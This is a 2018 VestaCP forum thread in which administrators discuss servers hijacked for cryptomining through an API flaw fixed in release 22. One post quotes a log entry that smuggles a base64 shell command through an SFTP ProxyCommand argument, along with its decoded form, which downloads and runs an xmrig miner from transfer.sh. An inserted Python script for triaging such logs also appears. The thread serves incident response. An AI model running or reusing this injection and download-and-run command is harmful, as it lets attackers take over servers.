have been HACKED ! by xaxaxa.eu
Re: have been HACKED ! by xaxaxa.eu
To answer your question, I was indeed on release 20.
Code:
[xxx@two /]# cd /usr/local/vesta/bin
[xxx@two bin]# ./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 x86_64 yes 2018-04-09
vesta-php 0.9.8 17 x86_64 yes 2016-11-26
vesta-nginx 0.9.8 17 x86_64 yes 2016-11-26
Re: have been HACKED ! by xaxaxa.eu
As you said, I've shut down the hacked server and moved all users manually to another one.
you're up to date, good so far. now you need to clean your server - my point of view: Do not trust an infected server anymore. Better install a new one and migrate the users there.
No chance to take.
Thank you for all your great advice.
Re: have been HACKED ! by xaxaxa.eu
I'm going to wait until the outcome of your research and am looking forward to the results before I do anything. My panel is on automatic upgrades - I'm sure most of the user panels are that way.
Only thing that worried me tonight was the dead.file in my file directory and there was an IP from Korea trying to log in with SSH - I've since banned his IP with my Fail2Ban - hopefully there won't be more to follow.
Once I restarted VestaCP tonight everything was fine and when I did research at UNIX about the dead.file it didn't look as though the issue belonged to VestaCP. I'm not sure about that though.
Only bad part was when I mentioned this to my VPS Host they were worried and thought immediately I was hacked because of this thread at VestaCP. I wasn't hacked.
We'll be grateful if you could respond positively from the Admin of VestaCP so our VPS Hosts can have peace of mind about our VestaCP installations. Thanks.
Re: have been HACKED ! by xaxaxa.eu
sessionclean is part of the php package and should not be removed.
Re: have been HACKED ! by xaxaxa.eu
You are right! I will edit my post. Thanks!
- Os: CentOS 6x
- Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu
I got hacked as well. 3 Vesta servers, only 2 of them got hacked.
Initially, I didn't know what was going on, so I removed execute permission from /tmp, and that partially stopped it.
Later I found this forum and applied the updates.
Thanks Vesta team for your help and quick release of the patch.
Re: have been HACKED ! by xaxaxa.eu
My website was hacked on Jun 22 around 11:10 PM UTC. My server got upgraded to the latest version automatically, but I think the server was infected before that.
I have removed the miner file under /tmp/xmrig. Then I analyzed the server logs to find the root cause and found the following:
1. No new user (sysroot) has been created as mentioned in the first post's script.
2. No new cron jobs have been added.
3. xmrig was run with this command:
Code:
./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background
4. Found this log entry in /var/log/vesta/error.log:
Code:
2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo ...|base64 -d|sh" x' '******' [Error 15]
Decoded version:
Code:
cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
My OS: Ubuntu 16
FYI
@ScIT
Re: have been HACKED ! by xaxaxa.eu
+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code:
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo ...|base64 -d|sh" x' '******' [Error 15]
Code:
./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 22 amd64 yes 2018-06-29
vesta-nginx 0.9.8 22 amd64 yes 2018-06-29
vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29
vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
Re: have been HACKED ! by xaxaxa.eu
semasping wrote: ↑Wed Jul 18, 2018 8:29 pm
+1 for the last post. I have the same code in /var/log/vesta/error.log
Still the same question: Was the infection before or after the update to release 22?
There was a security issue in the API, so it was possible to run API commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the safest way is to reinstall the server and migrate user data.
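As an added example (not code from this thread or from the Vesta project), a small Python triage script for the two checks discussed here: it parses error.log entries of the shape quoted above, decodes the base64 argument piped into sh, lists the indicators this thread names (xmrig, wget into /tmp, chmod +x), and reads the vesta REL column from v-list-sys-vesta-updates output to tell whether the install predates R22. The log lines, the base64 argument and the listing are constructed samples.

```python
import base64
import re

# Constructed samples in the shape of the /var/log/vesta/error.log entry quoted in
# this thread; the base64 argument is a constructed stand-in, not the thread's blob.
PAYLOAD = base64.b64encode(
    b"cd /tmp;pkill xmrig;wget -qO xmrig https://example.invalid/xmrig"
    b"&&chmod +x xmrig&&./xmrig --background").decode()
SAMPLE_LOG = [
    "2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' '\"-oProxyCommand=echo "
    + PAYLOAD + "|base64 -d|sh\" x' '******' [Error 15]",
    "2018-06-23 09:00:00 v-add-user 'bob' '******' 'bob@example.invalid' [Error 4]",
]
# Constructed listing in the format printed by ./v-list-sys-vesta-updates.
SAMPLE_UPDATES = """PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 x86_64 yes 2018-04-09
vesta-php 0.9.8 17 x86_64 yes 2016-11-26"""
FIXED_RELEASE = 22  # the thread states the API issue is resolved in R22

LOG_RE = re.compile(r"^(\S+ \S+) (v-[\w-]+) (.*)$")
B64_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+-d\s*\|\s*sh")
SUSPICIOUS = ("xmrig", "xmr-stak", "wget ", "curl ", "/tmp", "chmod +x")

def triage_line(line):
    # Flag an entry that smuggles a script into an argument (ProxyCommand or
    # echo ...|base64 -d|sh), decode it and list known indicators; None = ordinary.
    m = LOG_RE.match(line)
    if not m:
        return None
    stamp, cmd, args = m.groups()
    b = B64_RE.search(args)
    if "ProxyCommand" not in args and not b:
        return None
    decoded = "<no base64 payload>"
    if b:
        try:
            decoded = base64.b64decode(b.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = "<undecodable>"
    hits = [s for s in SUSPICIOUS if s in decoded]
    return {"time": stamp, "cmd": cmd, "decoded": decoded, "indicators": hits}

def vesta_release(listing):
    # Return the REL column of the 'vesta' row from v-list-sys-vesta-updates output.
    for f in (row.split() for row in listing.splitlines()):
        if len(f) >= 3 and f[0] == "vesta" and f[2].isdigit():
            return int(f[2])
    return None

def needs_update(listing):
    rel = vesta_release(listing)
    return rel is None or rel < FIXED_RELEASE  # unknown or older than R22
```

Run triage_line over each line of a real error.log and needs_update over the real listing; any hit with indicators is a reason to treat the host as compromised regardless of the current release.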
Re: have been HACKED ! by xaxaxa.eu
ScIT wrote: ↑Thu Jul 19, 2018 6:52 am
Still the same question: Was the infection before or after the update to release 22?
The system was infected before the update.